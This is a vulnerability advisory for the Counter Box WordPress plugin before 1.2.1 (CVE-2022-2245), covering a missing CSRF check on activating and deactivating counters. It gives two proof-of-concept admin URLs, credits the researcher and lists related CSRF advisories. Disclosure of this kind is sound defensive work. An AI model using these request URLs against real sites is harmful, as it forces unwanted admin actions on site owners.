Counter Box < 1.2.1 – Arbitrary Counter Activation/Deactivation via CSRF | CVE 2022-2245 | Plugin Vulnerabilities

Description

The plugin is lacking CSRF check when activating and deactivating counters, which could allow attackers to make a logged in admin perform such actions via CSRF attacks

Proof of Concept

https://example.com/wp-admin/admin.php?page=counter-box&id=1&action=activate
https://example.com/wp-admin/admin.php?page=counter-box&id=1&action=deactivate

Affects Plugins

Fixed in 1.2.1

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Raad Haddad of Cloudyrion GmbH

Submitter

Raad Haddad of Cloudyrion GmbH

Submitter twitter

Verified

Yes

WPVDB ID

33705003-1f82-4b0c-9b4b-d4de75da309c

Timeline

Publicly Published

2022-07-08 (about 1 years ago)

Added

2022-07-08 (about 1 years ago)

Last Updated

2023-04-11 (about 1 years ago)

Other

Published

Title

Published

2023-11-02

Title

Decorator - WooCommerce Email Customizer < 1.2.8 - Cross-Site Request Forgery

Published

2022-08-01

Title

MailerLite - Signup forms (official) < 1.5.8 - API Key Update via CSRF

Published

2024-01-23

Title

Marketing Twitter Bot <= 1.11 - Settings Update to Stored XSS via CSRF

Published

2023-02-07

Title

Wicked Folders < 2.18.17 - Folder Structure Update via CSRF

Published

2024-04-12

Title

BEAF < 4.5.5 - Cross-Site Request Forgery to Notice Dismissal